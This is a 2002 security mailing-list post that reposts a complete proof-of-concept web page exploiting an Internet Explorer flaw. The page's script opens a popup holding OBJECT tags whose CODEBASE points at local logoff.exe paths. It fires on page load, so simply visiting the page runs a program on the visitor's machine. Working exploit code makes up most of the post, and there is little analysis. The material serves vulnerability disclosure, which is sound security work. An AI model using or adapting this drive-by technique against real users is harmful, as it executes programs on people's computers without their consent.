Re: Rather large MSIE-hole

From: Magnus Bodin (magnus@bodin.org)
Date: 03/13/02 

Date: Wed, 13 Mar 2002 07:06:35 +0100
From: Magnus Bodin <magnus@bodin.org>
To: vuln-dev@securityfocus.com

On Tue, Mar 12, 2002 at 11:32:20AM +0100, Magnus Bodin wrote:
>
> The latest MSIE-hole is now spreading.

Sorry. Something broke there with the inclusion of the code.
I've not done any large scale testing of this a part from getting reports
from a lot of friends and colleagues that they are vulnerable still after
running windows update.

Here it is, comlete with all the pop-up-code:

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>

<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
        'c:/windows/system32/logoff.exe',
        'c:/winxp/system32/logoff.exe',
        'c:/winnt/system32/logoff.exe'
);

function Init(){
        var oPopup=window.createPopup();
        var oPopBody=oPopup.document.body;
        var n,html='';
        for(n=0;n<programName.length;n++)
                html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
        oPopBody.innerHTML=html;
        oPopup.show(290, 390, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here----- 

-- 
magnus                               MICROS~1 BOB was written in Lisp.         
            http://x42.com/

Loading